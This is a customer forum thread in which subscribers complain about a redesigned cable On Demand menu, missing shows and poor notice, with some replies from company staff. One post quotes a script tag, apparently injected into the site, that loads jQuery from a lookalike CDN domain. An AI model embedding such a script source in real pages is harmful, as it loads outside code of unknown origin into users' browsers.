Contributor
sd_viewer

Re: Changes to On Demand Menu--POST HERE

Well Grimm showed up... so maybe there's hope.

Agree with Azaza - the change isn't all that much better.  I kinda liked "All Series" just to see what was carried.

Sure wish it was a better executed change.

New Visitor
pjmmjm

I agree I am seeing the same thing with having to go to TV network vs. just TV series and when I go there I see no RH of NY and old versions of other shows.  They have changed things so much that it's unusable.  Taking away previous functionality is never a good thing.

Contributor
polsen01

Some one mentioned Top Gear on BBC America in an earlier post.  Will more episodes of the show be available at a later date?  Currently season 2 and 13 are available On Demand after the changes and up to season 18 are only available on xFinity.com. Would prefer to watch them on the TV.

New Visitor

Where is the travel channel? It's not in the tv section and the shows are not pulled up in search. Please tell me you did't keep Anthony Bourdain bit did keep Jersylicious.

Contributor
hgreenbe

Re: Wrong info on TV listing

several tv shows have been reported missing (alphas, last resort, tnt) from the new (and improved) directory.  Will someone from Comcast respond?

Regular Contributor

Changes to On Demand Menu--RIDICULOUS

Instead on being able to browse ALL TV shows available, we must now choose A through C, browse that section, then go back to the menu and choose D-F and browse that section... HELLO?!

Not having a button to BROWSE ALL is the worst oversight in the solar system.

Do you people at comcast even use your own service???

This means to browse through the entire list you have to go back and forth to the menu 8 times. SERIOUSLY? And your customer service people could only tell me:

1. They weren't aware changes had taken place in NH already.

2. You have to get use to it because it won't change again.

SOOoooooo frustrating. Looking into ditching cable and phone at this point. Paying $200/month for basics.

Official Employee
ComcastEric

Lucilynette, you can find the Travel Channel under TV Shows > By Network.

Regular Contributor

Where is the BROWSE ALL under TV Shows? Do you know what it's like to have to browse 3 letters at time and keep switching back and forth to the letter menu?

This is the worst redesign I have seen in a user interface. It's like there was no consideration for the user.

While some redesign would have been welcome, why not do something about the fact that once you leave the list and click on a show to check out what it is, you cannot go back to where you were in the list - you have to completely start again at the beginning and browse back to where you were in the list.

Please consider the user experience...we pay enough for it.

Official Employee
ComcastEric

For those that have posted about Alphas on SyFy, we are aware of the issue and are currently troubleshooting why it isn't showing up.  It should be available again shortly.  Sorry for the inconvenience.

Eric

Regular Contributor

Ditto.

Regular Contributor

Re: SERIES for On Demand Missing from Menu

Yes, there has been a grossly inconvenient  redesign. Now it's called TV Shows. And they've sectioned it so we can no longer browse all.

Official Employee
ComcastEric

jonalisa, thank you for the suggestion to add a BROWSE ALL button.  Your suggestion has been forwarded to the programming team to be considered. 

Eric

Contributor
sd_viewer

[ Edited ]

"suggestion to add a BROWSE ALL button" ... "forwarded to the programming team to be considered"

Yeah, I think it was called "All Series"... let them know they'll probably find something just like that in the older version of your service software.

You may want to ask them to consider enabling FastFoward through "content" (but not ads) to make a lot of other users happy too!

Regular Contributor

Thank you.

New Visitor
blacktalon06

How about Streampix? The HD versions of Battlestar Galactica just disappeared after the update. The low-def versions are still there, but now the Battlestar Galactica HD folder is completely empty. These were supposed to be available until February. I cancelled my Netflix and recetly kep my package the same because of the Streampix service. Comcast needs to get all this back up, or roll back the update unitl its ready for launch. test, test, test, launch. I would like my service back or a bill credit....

New Visitor

Loss of "Network" listing for On Demand shows

Without "Network" option, it is more difficult to find shows to watch in On Demand shows!   Why change a simple, easy way to find programs?

Official Employee
ComcastEric

I've reported the Battlestar HD issue and we're working on restoring those.  Sorry for the inconvenience.

Eric

Official Employee
ComcastEric

Re: Loss of "Network" listing for On Demand shows

You can find Networks under TV Shows > By Networks.

Official Employee
ComcastEric

New Visitor
blacktalon06

I am cancelling the Streampix service, which means cancelling other things as well and lowering my bill. What is the point of putting dates on the material you make available if you just make it disappear at anytime? That's not an inconvience, that's a lie. It disappeared during the update and had a date of 02-23-12, now we are being told that it just waon't be available, but the low-def versions will be? Not to mention that I pay extra for HD to be in two rooms. I always defend Comcast, and tell others to get rid of thier satellite dishes, but after this, that won't be happening again...dissappointment.

New Visitor
rbherrera

I dont know if I have the right section, but we noticed changes over the past week too. We have been watching Dexter season 5 from the xfinity ipad app and poof - episodes 7, 11, and 12 are no longer listed. They were just listed as ending 12/17, guess not.

New Visitor

Thank you. I found the travel channel but it is not under HD just the regular network section. You can watch travel channel  HD live, why not on demand?

New Visitor

this sucks

history on demand gone.

less available since the menu change

we should get a price reduction because we all pay so much anyway.

maybe time to move to another provider

New Visitor
yuki_gurl

Sooo if all the TV shows are under TV shows. Why is Fuse under music? It has shows on it not just videos.

Also a tutorial on how to use the new menue is needed at the top of the OnDemand screen, I googled Just to find this.

New Visitor
ZamilyMan

[ Edited ]

I am very dissatisfied with the On Demand changes as well as the customer support to try to understand these changes. On October 1st, I used Comcast Chat to express that the On Demand Menu has changed, and that I no longer have access to TV shows our family watched together (unless I want to pay for a subscription to Streampix). The Chat Technician had no idea about the changes that took place. His answer was "Just to let you know the shows on OnDemand do change every so often." I was put on hold several times after that, and after about 15-20 mins of total chat time, told "I have checked your account and it seems that there is nothing that should cause that issue . . . please expect a call from our technician shortly."

Needless to say, I never received the call. Today I spoke with Christopher on phone support. He first took my ticket number from the chat support session, and said "I see the problem has not been resolved . . . we can have a technician there Wednesday  morning." I told him I just want to know why some shows are no longer available for viewing OnDemand. He acknowledged that "Yes, there have been some changes to the OnDemand menu." He tried to tell me about this being an upgrade, and it is now called Xfinity OnDemand, not Comcast OnDemand. He was giving a spin about extra programming features, while trying to convince me that the same shows are still available. When I gave him one specific show no longer available (Hotel H*ll), he said it was "available streaming to your iPhone, iPad, Desktop or laptop on XfinityTV.net." I told him I am paying for Cable to watch with my family on our 50 inch screen, not on my laptop! He suggested I post my issue on the Comcast Support Forum. The only solution I am left with is to search for another provider.

• A notice should've been sent out
  • Customer Service employees should've been educated about the change
  • Customer service should not make meaningless suggestions.
Service Expert
Queen-Evie

Simple reason for Hotel H*ell not being available in On Demand: Fox pulled it. There is nothing Comcast or any other cable company can do once the network decides to make the show unavailable online or through On Demand.

Comcast employees must be authorized to post in the forum in an official capacity. Employees posting here have their names in red and are designated as employees. Names not in red are customers.

This is done to protect customers and for assurance that they are dealing with a Comcast employee.
Non-Authorized Employees are allowed to post but cannot state they are employees nor can they allude to being employees.

New Visitor
romazzi

On Demand New Menu

On Demand used to have the shows listed in alphabetical categories, as well as one that said ALL SHOWS which made it easy to scroll through to see what shows I missed.  Now I have to do each group one at a time, very time consuming.  New On Demand menus are very difficult to use.  Liked the old way better.

Regular Contributor

And you don't think it would be appropriate to notify the customers of this changes???

This is the kind of attitude that upsets customers.

Regular Contributor

The page up and down arrows on the remote allow you to rewind or fast forward by 5 min at a time. Sometimes I find I can fast forward 5 min and then use the regular rewind button to go back to right after the commercials.

Regular Contributor

The reason for the change is that we have reorganized several TV programming folders into one convenient location.Convenient for who?

You will still find all the same great content from your favorite TV programs On Demand in the TV Shows folder. Obviously not true.

Well, we now know that this change has not been convenient for the customer and that we disagree on the logic (or lack thereof) behind the redesign, as the prime users. Since the customers find it counterintuitive and are upset with the lack of notification and loss of content - perhaps you do not understand the end-user enough to make those decisions. Would it not be a good time for the company to put out some sort of announcement/explanation on the initial OnDemand screen?

This is a screw-up of Netflix-size proportions. In this economy, people have to continually try to rationalize the cost of cable to their budget. The price structure is crafted to make it difficult and expensive to unbundle services and yet we continue to get less and less for our money. Comcast's decisions seem to be made solely for the purpose of growing the bottom line. Would it really be that difficult to consider the customer first?

Digital basic, basic internet and phone for almost $200/mo? We're returning our DVR and eliminating phones. Comcast, you have a great opportunity to connect with your customer base. Admit your screw up and apologize.

New Visitor
PAngel279

[ Edited ]

jonalisa wrote:

Where is the BROWSE ALL under TV Shows? Do you know what it's like to have to browse 3 letters at time and keep switching back and forth to the letter menu?

This is the worst redesign I have seen in a user interface. It's like there was no consideration for the user.

While some redesign would have been welcome, why not do something about the fact that once you leave the list and click on a show to check out what it is, you cannot go back to where you were in the list - you have to completely start again at the beginning and browse back to where you were in the list.

Please consider the user experience...we pay enough for it.

Thank you!

Having to flip through 7 pages to view all shows is daft (idi*tic is a bad word, really?). Someone in development was not thinking about user friendliness, which the new setup is not.

Also, having to check 3+ spots for shows is redundant. I shouldn't have to look by tv show, network, or past/current episode to find a particular show. It's frustrating.

The search function hardly ever works.

And for some reason, this site is entering this javascript into the post and I can't get rid of it.

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Visitor
Stevedots

Had to come HERE to find out about changes to the On Demand menu...BECAUSE NO ONE AT COMCAST TOLD ME!!!!

It is now a real pain in the A** to find shows that I normally watched On Demand. And from what I have read, some of the shows I want to watch may already be gone!

Comcast...you are making it harder and harder for me to stay a loyal customer. I have my TV, Phone and Internet through Comcast at a cost of $200 per month! That is $2400 per year, and this is the service I get?

You are starting to make me agree with something my father said over 30 years ago. He said when Cable first came out...."PAY FOR TV?" Watch out Comcast, you may be loosing me as a customer if things don't get better organized and cheaper!

New Visitor

This reminds me of the Microsoft Office Ribbon situation. Maybe the Ribbon makes logical sense, but the problem is that people have been using the Menu format for years and have gotten used to it. Comcast switching up the format of their menu selections after having people get used to the old one is stupid. I have developed a pattern of exactly where to go when looking for something on demand and in one fell swoop comcast has thrown all of that in the crapper without even so much as a warning.

Somtimes if it ain't broke, it's better not to fix it.

Visitor
Stevedots

I have now had a day or two to use the new format. I am getting used to now but it still would have been nice to be given a heads up on the changes before they were implemented.

New Visitor
NBAKingzFan10

I am in agreement with the comments about the "browse all" feature that was available on previous versions of on demand for TV Shows. I understand the suggestion has been submitted, but I had to vocalize my displeasure with removing the feature to begin with! It has made using on demand, with any ease, nearly impossible and in any instance in which I just want to browse shows for viewing (not knowing what to watch in advance is common in our household), I usually get so frustrated that I will switch to the Netflix/Hulu+ services available through my Blu-Ray player or Xbox 360, instead. Definitely a downgrade to the overall experience of the on demand feature, especially for what I use it for.

Contributor
passem

On Demand is really the only thing I missed when I switched to DirecTV, but I had to come back to Comcast due to dish unavailability. I use On Demand extensively, but it gets worse and worse all the time. On Demand movies get harder and harder to watch, especially films on "IMPACT" that have a box plastered right over the movie, not just for 30 seconds but for up to 10 minutes. So I don't even order them anymore. FearNet has long been almost unwatchable for the same reason. Now, I have to go through all sorts of gyrations to find the former Cutting Edge programs, and nothing was announced about these moves.

I realize Comcast is just another corporate global monstrosity now and couldn't care less about one viewer's opinion. Just feels good to remind them that there is, for many people at least, other options, and if you abuse us too much you WILL lose customers, en masse.

Contributor
passem

Re: Video on Demand now RUINED - I am FURIOUS !!!!!

You are right, but here's the worst part - COMCAST COULDN"T CARE LESS WHAT WE THINK.

Contributor
passem

Re: Changes to on demand menu

So, how long did you say you've worked for COMCAST?

Regular Contributor

Seriously, how long are we going to have to wait? How many months until the eff-ing menu is fixed and we can Browse All and find things in an intuitive way. It totally amazes me that the people in charge of the changes HAVE NOT ONE CLUE how we use the system. And now that we've complained...nothing.

You've managed to screw things up, keep us in the dark about it and then ignore us in a relatively short period of time. What's your next move, Comcast?

New Visitor
rosita706

The new menu is very hard to see. I like the pictures online, but they are too small on the tv, I really have to squint to see what is there. Is there a way to revert to the old format?
New Visitor
brandondaly

[ Edited ]

I must say. I am pretty upset with the new menus. Ok great so now I have tv shows, movies and news. Where are the discovery and science channel specials/documentaries! Nowhere! Search for it?? Typically I haven't seen these before so I have no idea what they are called. Please restore the old menus.

Thanks Comcast

New Visitor

Does anybody know how to back up with the xfinity remote while OnDemand? I have to exit out and go back in to start a new search. 

Regular Contributor

ncchristian wrote:

Does anybody know how to back up with the xfinity remote while OnDemand? I have to exit out and go back in to start a new search. 

There is no way to back up to where you were. Nice, huh? Another design flaw.

New Visitor

That really sucks! Let's hope thedistract fixing these flaws! 

Regular Contributor

From the On Demand Menu, select TV Shows/By Network and you will find Discovery Channel & Science Channel content

New Visitor
CPardy

What happened to all of the free shows under TV Series?? I now have to PAY to watch NatGeo shows on demand? Last week Bad Girls Club was free now I have to PAY for that now?? Why am I paying this much every month to lose what I watch every month. If this continues I may just have to drop cable for netflix, hulu or such. I've had a comcast account since 1984 and this is how they treat long term users??? OUTRAGED!
New Visitor
Onyxkeeper1

I am hoping someone can tell me where to find some things that were on life and home, but aren't really channels. Such as short crafting shows and Yule log. Anyone?? Thanks :smileyhappy:
New Visitor
schiff177

I am a huge Top Gear fan and with the new update there is no Top Gear listing in the On Demand Tv Series section anymore. However, If I go to the Search button and type in Top Gear, all of the listings come up but it is very inconvient because they don't say what episode number they are and it takes extra time to do so. Please fix this and add Top Gear back in the On Demand menu please! 

Contributor
Merthrik

[ Edited ]

@passem: Is this box a "Network" box from the Network? I.E... Impact's, or Fearnets?   If it is a Comcast/Xfinity menu box, I believe you can press Exit on the remote, once the show is playing, and it will remove the box.  I have to do this when I'm watching Previews.

I must say I am not very "Fond" of the new Menu either.  I am having a hard time trying to understand how this new menu is more "Convenient" for me?  I tend to believe that it is more "Convenient" for Xfinity/Comcast, whatever the actual name is now anyway.

I find that I have to browse through more menus to find what I want.  And, even then what used to be in the History/Military whatever folder, is not there now in the new TV Shows folder.

Now the probability of them reverting the menu changes back, is MOST UNLIKELY...I realize this.  But, I am not very content with it.

I have also noticed, that for instance:  With the TV Mini Series "Titanic: Blood & Steel" showing on Encore.  That there are different shows in the Encore folder, than there are in the TV Shows Folders...?  In fact I had to navigate to one folder to watch 1-4, then the other folder to watch 5-7, then back to the other folder to watch 8-12, also they were not all posted in HD.  I have the HD package, so you get the point there.

This "Migration" seems to have created a lot of Ripples & Waves that need to be addressed STAT!

Regular Contributor

Browse All - OnDemand changes...Is it going to be fixed OR not?

You changed the OnDemand menu literally overnight and despite many, many complaints - I see no resolution for the missing BROWSE ALL button. How many months are we expected to wait while you do NOTHING?

I want to know if this is going to be fixed or not.

If so, when?

If not, I'd like to know the reason why not.